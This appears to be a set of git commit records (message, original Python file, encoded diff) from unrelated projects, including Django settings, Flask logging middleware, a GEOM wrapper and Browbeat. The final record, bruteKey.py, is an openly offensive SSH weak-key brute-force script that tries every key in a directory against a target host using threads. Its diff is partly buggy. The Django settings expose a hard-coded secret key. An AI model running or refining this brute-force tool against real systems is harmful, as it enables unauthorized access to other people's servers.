        sorted_score_array_index = docs_score_array.argsort()
        final_name_array = docs_name_array[sorted_score_array_index]
        sorted_compared_file_label = compared_file_label[sorted_score_array_index]

        # pack the scores and names in data_frame
        score_name_data_frame = pd.DataFrame(final_score_array,
                                             index=final_name_array,
                                             columns=["Cosine similarity"])

        return score_name_data_frame

    def get_similarity_score(self) -> pd.DataFrame:
        return self._similarity_maker()
Python
0
@@ -2531,150 +2531,8 @@ GE%0A%0A - # get labels%0A labels = %5Bself._id_temp_label_map%5Bfile_id%5D%0A for file_id in self._doc_term_matrix.index.values%5D%0A%0A @@ -2645,79 +2645,64 @@ get -an array of file index in file manager files%0A other_file +index of selected file in the DTM%0A selected _index -es = n @@ -2741,15 +2741,11 @@ dex -! += =%0A - @@ -2814,16 +2814,20 @@ e_id)%5B0%5D +%5B0%5D%0A %0A @@ -2827,27 +2827,69 @@ -select_file +# get an array of compared file indexes%0A other _indexes @@ -2924,33 +2924,27 @@ atrix.index -= +! =%0A - @@ -3057,15 +3057,38 @@ -Test = +docs_score_array = np.asarray( %5Bdis @@ -3103,37 +3103,32 @@ ndex, select -_fil e +d _index -es %5D%0A @@ -3134,136 +3134,21 @@ -for file_index in other_file_indexes%5D%0A docs_score_array = np.asarray(%0A %5Bdist%5Bfile_index, select_file_indexes%5D%0A + @@ -3176,29 +3176,24 @@ ex in other_ -file_ indexes%5D)%0A%0A @@ -3256,16 +3256,17 @@ le_label +s = np.as @@ -3451,216 +3451,8 @@ d%5D)%0A - docs_name_array = np.asarray(%5Blabels%5Bi%5D%0A for i in list(other_file_indexes)%5D)%0A%0A # sort the score array%0A sorted_score_array = np.sort(docs_score_array)%0A %0A @@ -3457,16 +3457,25 @@ # + sort and round t @@ -3492,22 +3492,8 @@ rray - to 4 decimals %0A @@ -3526,22 +3526,28 @@ p.round( +np. sort -ed +(docs _score_a @@ -3550,16 +3550,17 @@ re_array +) , decima @@ -3600,230 +3600,93 @@ ray -in terms of the score array%0A sorted_score_array_index = docs_score_array.argsort()%0A final_name_array = docs_name_array%5Bsorted_score_array_index%5D%0A sorted_compared_file_label = compared_file_label%5Bsorted +to correctly map the score array%0A final_name_array = compared_file_labels%5Bdocs _sco @@ -3693,22 +3693,26 @@ re_array -_index +.argsort() %5D%0A%0A @@ -4055,17 +4055,16 @@ aFrame:%0A -%0A
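The diff removes the unused Test/labels intermediates and, crucially, swaps the ==/!= selectors so the selected index really is the compared file and the remaining indexes are everything else, then orders names with argsort of the same score array so labels stay aligned with their values. A reduced numerical sketch of the fixed flow (the toy matrix and labels are invented):

import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

dtm = np.array([[1., 0., 2.], [0., 1., 1.], [2., 0., 1.]])
labels = np.array(["doc0", "doc1", "doc2"])
comp = 0  # row being compared

dist = 1 - cosine_similarity(dtm)
others = np.where(np.arange(len(dtm)) != comp)[0]
scores = dist[others, comp]

# argsort on the scores orders the labels consistently with np.sort.
print(labels[others][scores.argsort()], np.round(np.sort(scores), 4))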
d0e75c65505713a5f044d67a08e6697c4e332611
Add djangobower and update static settings
darts/darts/settings.py
darts/darts/settings.py
""" Django settings for darts project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'yg&r*1k#$nak&g*9ay6zh!+@*=f=ids5u10a!!r^yjvltw0&8=' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'darts.urls' WSGI_APPLICATION = 'darts.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/'
Python
0
@@ -1000,16 +1000,34 @@ files',%0A + 'djangobower'%0A )%0A%0AMIDDL @@ -2050,8 +2050,494 @@ tatic/'%0A +STATIC_ROOT = os.path.join(BASE_DIR, 'static')%0ASTATIC_DIRS = (%0A os.path.join(BASE_DIR, 'assets'),%0A)%0A%0ASTATICFILES_FINDERS = (%0A 'django.contrib.staticfiles.finders.FileSystemFinder',%0A 'django.contrib.staticfiles.finders.AppDirectoriesFinder',%0A 'djangobower.finders.BowerFinder',%0A)%0A%0ATEMPLATE_DIRS = (%0A os.path.join(BASE_DIR, 'templates'),%0A)%0A%0A# Djangobower%0ABOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')%0ABOWER_INSTALLED_APPS = (%0A 'jquery',%0A 'bootstrap',%0A)
5273e0fcdf2b7f1b03301cb0834b07da82064b98
Remove trailing \n
mailproc/vidmaster.py
mailproc/vidmaster.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Zoe vidmaster - https://github.com/rmed/zoe-vidmaster
#
# Copyright (c) 2015 Rafael Medina García <[email protected]>
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import argparse
import sys

parser = argparse.ArgumentParser()
parser.add_argument('--mail-subject', dest='subject')
parser.add_argument('--msg-sender-alias', dest='sender')
parser.add_argument('--application/octet-stream', dest='script')


if __name__ == '__main__':
    args, unknown = parser.parse_known_args()

    if args.subject != "vidmaster":
        sys.exit(0)

    print("message dst=vidmaster&tag=compose&script=%s&sender=%s\n" % (
        args.script, args.sender))
Python
0.000017
@@ -1689,10 +1689,8 @@ r=%25s -%5Cn %22 %25
a7a1a83bf0f6546b1e985b7c4611b5b83df25853
Add python's version in breakpad stack traces
breakpad.py
breakpad.py
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Breakpad for Python.

Sends a notification when a process stops on an exception.

It is only enabled when all these conditions are met:
  1. hostname finishes with '.google.com'
  2. main module name doesn't contain the word 'test'
  3. no NO_BREAKPAD environment variable is defined
"""

import atexit
import getpass
import os
import urllib
import traceback
import socket
import sys


# Configure these values.
DEFAULT_URL = 'https://chromium-status.appspot.com/breakpad'

_REGISTERED = False


def FormatException(e):
  """Returns a human readable form of an exception.

  Adds the maximum number of interesting information in the safest way."""
  try:
    out = repr(e)
  except Exception:
    out = ''
  try:
    out = str(e)
    if isinstance(e, Exception):
      # urllib exceptions, usually the HTTP headers.
      if hasattr(e, 'headers'):
        out += '\nHeaders: %s' % e.headers
      if hasattr(e, 'url'):
        out += '\nUrl: %s' % e.url
      if hasattr(e, 'msg'):
        out += '\nMsg: %s' % e.msg
      # The web page in some urllib exceptions.
      if hasattr(e, 'read') and callable(e.read):
        out += '\nread(): %s' % e.read()
      if hasattr(e, 'info') and callable(e.info):
        out += '\ninfo(): %s' % e.info()
  except Exception:
    pass
  return out


def SendStack(last_tb, stack, url=None):
  """Sends the stack trace to the breakpad server."""
  if not url:
    url = DEFAULT_URL
  print 'Sending crash report ...'
  try:
    params = {
        'args': sys.argv,
        'stack': stack[0:4096],
        'user': getpass.getuser(),
        'exception': FormatException(last_tb),
        'host': socket.getfqdn(),
        'cwd': os.getcwd(),
    }
    # pylint: disable=W0702
    print('\n'.join('  %s: %s' % (k, v[0:50]) for k, v in params.iteritems()))
    request = urllib.urlopen(url, urllib.urlencode(params))
    print(request.read())
    request.close()
  except IOError:
    print('There was a failure while trying to send the stack trace. Too bad.')


def CheckForException():
  """Runs at exit. Look if there was an exception active."""
  last_value = getattr(sys, 'last_value', None)
  if last_value and not isinstance(last_value, KeyboardInterrupt):
    last_tb = getattr(sys, 'last_traceback', None)
    if last_tb:
      SendStack(last_value, ''.join(traceback.format_tb(last_tb)))


def Register():
  """Registers the callback at exit. Calling it multiple times is no-op."""
  global _REGISTERED
  if _REGISTERED:
    return
  _REGISTERED = True
  atexit.register(CheckForException)


# Skip unit tests and we don't want anything from non-googler.
if (not 'test' in sys.modules['__main__'].__file__ and
    not 'NO_BREAKPAD' in os.environ and
    (socket.getfqdn().endswith('.google.com') or
     socket.getfqdn().endswith('.chromium.org'))):
  Register()

# Uncomment this line if you want to test it out.
#Register()
Python
0.000057
@@ -1840,24 +1840,56 @@ s.getcwd(),%0A + 'version': sys.version,%0A %7D%0A #
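A two-line change: the crash-report payload gains the interpreter version so reports can be bucketed per Python build. sys.version is a ready-made human-readable string:

import sys

# What the diff adds under params['version'].
print(sys.version)  # e.g. '2.7.18 (default, ...) [GCC ...]'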
95d9c3ecd9a8c2aa73fd91ffdf40a55fee541dd3
Enable flatpages without middleware.
suorganizer/urls.py
suorganizer/urls.py
"""suorganizer URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.8/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Add an import: from blog import urls as blog_urls 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls)) """ from django.conf.urls import include, url from django.contrib import admin from blog import urls as blog_urls from contact import urls as contact_urls from organizer.urls import ( newslink as newslink_urls, startup as startup_urls, tag as tag_urls) from .views import redirect_root urlpatterns = [ url(r'^$', redirect_root), url(r'^admin/', include(admin.site.urls)), url(r'^blog/', include(blog_urls)), url(r'^contact/', include(contact_urls)), url(r'^newslink/', include(newslink_urls)), url(r'^startup/', include(startup_urls)), url(r'^tag/', include(tag_urls)), ]
Python
0
@@ -687,16 +687,81 @@ rt admin +%0Afrom django.contrib.flatpages import %5C%0A urls as flatpage_urls %0A%0Afrom b @@ -1283,10 +1283,49 @@ urls)),%0A + url(r'%5E', include(flatpage_urls)),%0A %5D%0A
411751a10ece8b84bb122422b8d58f22710731aa
Fix typo
relayer/flask/logging_middleware.py
relayer/flask/logging_middleware.py
from datetime import datetime


class LoggingMiddleware(object):

    def __init__(self, app, wsgi_app, context, logging_topic):
        self.app = app
        self.wsgi_app = wsgi_app
        self.context = context
        self.logging_topic = logging_topic

    def __call__(self, environ, start_response):
        with self.app.app_context():
            start_time = datetime.utcnow()
            status_code = None
            content_length = None
            self.context.start_request()

            def logging_start_response(status, response_headers, exc_info=None):
                nonlocal status_code, content_length
                status_code = int(status.partition(' ')[0])
                for name, value in response_headers:
                    if name.lower() == 'content-length':
                        content_length = int(value)
                        break
                return start_response(status, response_headers, exc_info)

            response = self.wsgi_app(environ, logging_start_response)
            if content_length is None:
                content_length = len(b''.join(response))

            elapsed_time = datetime.utcnow() - start_time
            elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000

            request_log = {
                'date': start_time.isoformat(),
                'user_agent': environ.get('HTTP_USER_AGENT'),
                'method': environ.get('REQUEST_METHOD'),
                'path': environ.get('PATH_INFO'),
                'query_string': environ.get('QUERY_STRING'),
                'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')),
                'x_forwarded_for': environ.get('X_Forwarded_For'),
                'status': status_code,
                'content_length': content_length,
                'request_time': elapsed_time_milliseconds
            }
            self.context.end_request(self.logging_topic, request_log)

            return response
Python
0.999999
@@ -1728,20 +1728,20 @@ 'X_F -orwarded_For +ORWARDED_FOR '),%0A
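Context for the typo fix: environ lookups are exact string matches, and header-derived keys are conventionally upper-cased with dashes mapped to underscores (real request headers also gain an HTTP_ prefix under WSGI), so the mixed-case 'X_Forwarded_For' key could never match whatever the upstream proxy populated. A sketch of the conventional mapping; the helper name is illustrative:

# Header name -> environ key, per the CGI convention WSGI inherits.
def header_to_environ_key(header, prefix="HTTP_"):
    return prefix + header.upper().replace("-", "_")

print(header_to_environ_key("X-Forwarded-For"))  # HTTP_X_FORWARDED_FOR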
e29878f36ed78c8e7acf683029252001daf1e4c4
Add a description method.
bsd/geom.py
bsd/geom.py
#+
# Copyright 2015 iXsystems, Inc.
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#####################################################################

import sysctl
from xml.etree import ElementTree as etree

_classes = {}
_geoms = {}
_providers = {}


class GEOMBase(object):
    def __init__(self, xml):
        self.xml = xml

    @property
    def id(self):
        return self.xml.attrib['id']


class GEOMClass(GEOMBase):
    @property
    def name(self):
        return self.xml.find('name').text

    @property
    def geoms(self):
        for i in self.xml.findall('geom'):
            yield GEOMObject(i)

    def geom_by_name(self, name):
        ret = list(filter(lambda g: g.name == name, self.geoms))
        return ret[0] if len(ret) > 0 else None

    def __str__(self):
        return "<geom.GEOMClass name '{0}' id '{1}'>".format(self.name, self.id)

    def __repr__(self):
        return str(self)

    def __getstate__(self):
        return {
            'name': self.name,
            'geoms': [x.__getstate__() for x in self.geoms]
        }


class GEOMObject(GEOMBase):
    @property
    def name(self):
        return self.xml.find('name').text

    @property
    def rank(self):
        return int(self.xml.find('rank').text)

    @property
    def clazz(self):
        return class_by_id(self.xml.find('class').attrib['ref'])

    @property
    def provider(self):
        return self.providers.next()

    @property
    def providers(self):
        for i in self.xml.findall('provider'):
            yield GEOMProvider(i)

    @property
    def consumers(self):
        for i in self.xml.findall('consumer'):
            yield GEOMConsumer(i)

    @property
    def config(self):
        config = self.xml.find('config')
        if config is not None:
            return {i.tag: i.text for i in config}

        return None

    def __str__(self):
        return "<geom.GEOMObject name '{0}' id '{1}'>".format(self.name, self.id)

    def __repr__(self):
        return str(self)

    def __getstate__(self):
        return {
            'id': self.id,
            'name': self.name,
            'class_id': self.clazz.id,
            'config': self.config,
            'providers': [x.__getstate__() for x in self.providers],
            'consumers': [x.__getstate__() for x in self.consumers]
        }


class GEOMProvider(GEOMBase):
    @property
    def geom(self):
        return geom_by_id(self.xml.find('geom').attrib['ref'])

    @property
    def mode(self):
        return self.xml.find('mode').text

    @property
    def name(self):
        return self.xml.find('name').text

    @property
    def mediasize(self):
        return int(self.xml.find('mediasize').text)

    @property
    def sectorsize(self):
        return int(self.xml.find('sectorsize').text)

    @property
    def stripesize(self):
        return int(self.xml.find('stripesize').text)

    @property
    def stripeoffset(self):
        return int(self.xml.find('stripeoffset').text)

    @property
    def config(self):
        config = self.xml.find('config')
        if config is not None:
            return {i.tag: i.text for i in config}

        return None

    def __str__(self):
        return "<geom.GEOMProvider name '{0}' id '{1}'>".format(self.name, self.id)

    def __repr__(self):
        return str(self)

    def __getstate__(self):
        return {
            'name': self.name,
            'mode': self.mode,
            'geom_id': self.geom.id,
            'mediasize': self.mediasize,
            'sectorsize': self.sectorsize,
            'stripesize': self.stripesize,
            'stripeoffset': self.stripeoffset,
            'config': self.config
        }


class GEOMConsumer(GEOMBase):
    @property
    def geom(self):
        return geom_by_id(self.xml.find('geom').attrib['ref'])

    @property
    def mode(self):
        return self.xml.find('mode').text

    @property
    def provider(self):
        return provider_by_id(self.xml.find('provider').attrib['ref'])

    @property
    def config(self):
        config = self.xml.find('config')
        if config is not None:
            return {i.tag: i.text for i in config}

        return None

    def __str__(self):
        return "<geom.GEOMConsumer id '{0}'>".format(self.id)

    def __repr__(self):
        return str(self)

    def __getstate__(self):
        return {
            'geom_id': self.geom.id,
            'provider_id': self.provider.id,
            'config': self.config
        }


def scan():
    confxml = sysctl.sysctlbyname('kern.geom.confxml').strip('\x00')
    tree = etree.fromstring(confxml)
    for i in tree.findall('class'):
        cls = GEOMClass(i)
        _classes[cls.id] = cls
        for g in cls.geoms:
            _geoms[g.id] = g
            for p in g.providers:
                _providers[p.id] = p


def classes():
    return _classes.values()


def geoms():
    return _geoms.values()


def class_by_id(ident):
    return _classes[ident]


def class_by_name(name):
    ret = list(filter(lambda g: g.name == name, _classes.values()))
    return ret[0] if len(ret) > 0 else None


def geom_by_id(ident):
    return _geoms[ident]


def geom_by_name(classname, name):
    cls = class_by_name(classname)
    if not cls:
        return None

    return cls.geom_by_name(name)


def provider_by_id(ident):
    return _providers[ident]


# Do initial scan at module load time
scan()
Python
0.000107
@@ -4197,32 +4197,203 @@ offset').text)%0A%0A + @property%0A def description(self):%0A try:%0A d = self.xml.find(%22config/descr%22)%0A return d.text%0A except:%0A return None%0A %0A @property%0A
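The added property reads an optional <config>/<descr> node and falls back to None, matching the module's bare try/except style. A standalone sketch of that defensive lookup with a made-up XML snippet:

import xml.etree.ElementTree as etree

node = etree.fromstring(
    "<provider><config><descr>INTEL SSDSC2BB120G4</descr></config></provider>")
try:
    print(node.find("config/descr").text)  # INTEL SSDSC2BB120G4
except AttributeError:                     # find() returned None: no descr node
    print(None)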
17eaf5d3d0b3cf6c6fffc4ea70499cd9feeb6723
Set Logger to UTC
browbeat.py
browbeat.py
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from lib.Elastic import browbeat_uuid
from lib import PerfKit
from lib import Rally
from lib import Shaker
from lib import WorkloadBase
import argparse
import logging
import sys
import yaml
import datetime
import os
from pykwalify import core as pykwalify_core
from pykwalify import errors as pykwalify_errors

_workload_opts = ['perfkit', 'rally', 'shaker']
_config_file = 'browbeat-config.yaml'
debug_log_file = 'log/debug.log'


def _load_config(path, _logger):
    try:
        stream = open(path, 'r')
    except IOError:
        _logger.error("Configuration file {} passed is missing".format(path))
        exit(1)
    config = yaml.load(stream)
    stream.close()
    validate_yaml(config, _logger)
    return config


def validate_yaml(config, _logger):
    _logger.info("Validating the configuration file passed by the user")
    stream = open("lib/validate.yaml", 'r')
    schema = yaml.load(stream)
    check = pykwalify_core.Core(source_data=config, schema_data=schema)
    try:
        check.validate(raise_exception=True)
        _logger.info("Validation successful")
    except pykwalify_errors.SchemaError as e:
        _logger.error("Schema Validation failed")
        raise Exception('File does not conform to schema: {}'.format(e))


def _run_workload_provider(provider, config):
    _logger = logging.getLogger('browbeat')
    if provider == "perfkit":
        perfkit = PerfKit.PerfKit(config)
        perfkit.start_workloads()
    elif provider == "rally":
        rally = Rally.Rally(config)
        rally.start_workloads()
    elif provider == "shaker":
        shaker = Shaker.Shaker(config)
        shaker.run_shaker()
    else:
        _logger.error("Unknown workload provider: {}".format(provider))


def main():
    parser = argparse.ArgumentParser(
        description="Browbeat Performance and Scale testing for Openstack")
    parser.add_argument(
        '-s', '--setup', nargs='?', default=_config_file,
        help='Provide Browbeat YAML configuration file. Default is ./{}'.format(_config_file))
    parser.add_argument('workloads', nargs='*',
                        help='Browbeat workload(s). Takes a space separated'
                             ' list of workloads ({}) or \"all\"'.format(', '.join(_workload_opts)))
    parser.add_argument('--debug', action='store_true', help='Enable Debug messages')
    _cli_args = parser.parse_args()

    _logger = logging.getLogger('browbeat')
    _logger.setLevel(logging.DEBUG)
    _formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)7s - %(message)s')
    _dbg_file = logging.FileHandler(debug_log_file)
    _dbg_file.setLevel(logging.DEBUG)
    _dbg_file.setFormatter(_formatter)
    _ch = logging.StreamHandler()
    if _cli_args.debug:
        _ch.setLevel(logging.DEBUG)
    else:
        _ch.setLevel(logging.INFO)
    _ch.setFormatter(_formatter)
    _logger.addHandler(_dbg_file)
    _logger.addHandler(_ch)

    _logger.debug("CLI Args: {}".format(_cli_args))

    # Load Browbeat yaml config file:
    _config = _load_config(_cli_args.setup, _logger)

    # Default to all workloads
    if _cli_args.workloads == []:
        _cli_args.workloads.append('all')

    if len(_cli_args.workloads) == 1 and 'all' in _cli_args.workloads:
        _cli_args.workloads = _workload_opts
    invalid_wkld = [wkld for wkld in _cli_args.workloads if wkld not in _workload_opts]
    if invalid_wkld:
        _logger.error("Invalid workload(s) specified: {}".format(invalid_wkld))
        if 'all' in _cli_args.workloads:
            _logger.error("If you meant 'all' use: './browbeat.py all' or './browbeat.py'")
        exit(1)
    else:
        time_stamp = datetime.datetime.utcnow().strftime("%Y%m%d-%H%M%S")
        _logger.info("Browbeat test suite kicked off")
        _logger.info("Browbeat UUID: {}".format(browbeat_uuid))
        _logger.info("Running workload(s): {}".format(','.join(_cli_args.workloads)))
        for wkld_provider in _cli_args.workloads:
            if wkld_provider in _config:
                if _config[wkld_provider]['enabled']:
                    _run_workload_provider(wkld_provider, _config)
                else:
                    _logger.warning("{} is not enabled in {}".format(wkld_provider,
                                                                     _cli_args.setup))
            else:
                _logger.error("{} is missing in {}".format(wkld_provider,
                                                           _cli_args.setup))
        result_dir = _config['browbeat']['results']
        WorkloadBase.WorkloadBase.print_report(result_dir, time_stamp)
        _logger.info("Saved browbeat result summary to {}".format(
            os.path.join(result_dir, time_stamp + '.' + 'report')))
        WorkloadBase.WorkloadBase.print_summary()
    _logger.info("Browbeat Finished, UUID: {}".format(browbeat_uuid))


if __name__ == '__main__':
    sys.exit(main())
Python
0.000012
@@ -764,16 +764,28 @@ rt yaml%0A +import time%0A import d @@ -3128,24 +3128,63 @@ message)s')%0A + _formatter.converter = time.gmtime%0A _dbg_fil
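The mechanism behind this diff: logging.Formatter renders %(asctime)s through its converter attribute, which defaults to time.localtime; pointing it at time.gmtime makes every timestamp UTC without touching the format string. A self-contained sketch:

import logging
import time

formatter = logging.Formatter('%(asctime)s - %(message)s')
formatter.converter = time.gmtime  # asctime is now rendered in UTC

handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger = logging.getLogger('demo')
logger.addHandler(handler)
logger.warning('timestamps are UTC now')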
911e961f189967554bc5a046f022bb1c394cc119
Debug and test before finishing. p50-52
bruteKey.py
bruteKey.py
#!/usr/bin/env python

import pexpect, optparse, os
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> "


def banner():
    print "##### SSH Weak Key Exploit #######"
    print usage
    print ""


def connect(user, host, keyfile, release):
    global Stop
    global Fails
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + '@' + host + ' -i' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser('usage%prog -H ' + 'target host -u <user> -d <directory>')
    parser.


if __name__ == '__main__':
    main()
Python
0
@@ -1173,21 +1173,903 @@ %09parser. -%0A%0A%0A%0A%0A +add_option('-H', dest='tgtHost', type='string', help='specify target host')%0A%09parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')%0A%09parser.add_option('u', dest=user, type='string', help='specify the user')%0A%09(options, args) = parser.parse_args()%0A%09host = options.tgtHost%0A%09passDir = options.passDir%0A%09user =options.user%0A%09if host == None or passDir == None or user == None:%0A%09%09print parser.usage%0A%09%09exit(0)%0A%09for filename in os.listdir(passDir):%0A%09%09if Stop:%0A%09%09%09print '%5B*%5D Exiting: Key Found.'%0A%09%09%09exit(0)%0A%09%09if Fails %3E 5:%0A%09%09%09print '%5B!%5D Exiting: '+'Too Many Connections Closed by Remote Host.'%0A%09%09%09print '%5B!%5D Adjust number of simultaneous threads.'%0A%09%09%09exit(0)%0A%0A%09%09connection_lock.acquire()%0A%09%09fullpath = os.path.join(passDir, filename)%0A%09%09print '%5B-%5D Testing Keyfile '+str(fullpath)%0A%09%09t = Thread(target=connect, args =(user, host, fullpath, True))%0A%09%09child = t.start() %0A%0Aif __n